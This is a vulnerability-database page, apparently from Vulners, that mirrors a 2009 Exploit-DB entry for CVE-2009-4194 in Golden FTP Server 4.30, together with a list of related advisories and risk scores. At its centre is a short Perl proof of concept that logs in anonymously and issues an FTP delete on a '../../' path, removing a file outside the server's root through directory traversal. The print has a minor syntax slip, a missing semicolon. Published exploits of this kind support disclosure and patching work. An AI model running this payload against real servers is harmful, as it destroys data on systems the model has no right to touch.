Lucene search
+L

Golden FTP Server 4.30 - File Deletion

🗓️ 01 Dec 2009 00:00:00Reported by sharpeType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

Golden FTP Server 4.30 File Deletion Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-4194
1 Dec 200900:00
circl
CVE
CVE-2009-4194
3 Dec 200919:00
cve
Cvelist
CVE-2009-4194
3 Dec 200919:00
cvelist
NVD
CVE-2009-4194
3 Dec 200919:30
nvd
OpenVAS
Golden FTP Server 'DELE' Command Directory Traversal Vulnerability
5 Dec 200900:00
openvas
OpenVAS
Golden FTP Server 'DELE' Command Directory Traversal Vulnerability
5 Dec 200900:00
openvas
Prion
Directory traversal
3 Dec 200919:30
prion
Positive Technologies
PT-2009-6358 · Golden Ftp Server · Golden Ftp Server
3 Dec 200900:00
ptsecurity
# Exploit Title: [Golden FTP Server File Deletion Vulnerability]
# Date: [18.11.2009]
# Author: [sharpe]
# Software Link: [http://www.goldenftpserver.com/download.html]
# Version: [4.30 Free and Professional]
# Tested on: [Windows XP SP3]
# CVE : [if exists]
# Code : [http://blog.sat0ri.com/?p=292]

#---
#sat0ri - sudden enlightenment
#http://blog.sat0ri.com/

use strict;
use Net::FTP

my $ftp = Net::FTP->new(”192.168.1.35″, Debug => 1) || die $@;

$ftp->login(”anonymous”, ‘[email protected]’) || die $ftp->message;

# The FTP root is, via the configuration, set to C:\ftp\public
$ftp->cwd(”/public/”) || die $ftp->message;

# This deletes the file C:\bollocks.txt
$ftp->delete(”../../bollocks.txt”);

$ftp->quit;

$ftp = undef;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Dec 2009 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 26
CVSS 3.18.1
EPSS0.03444
33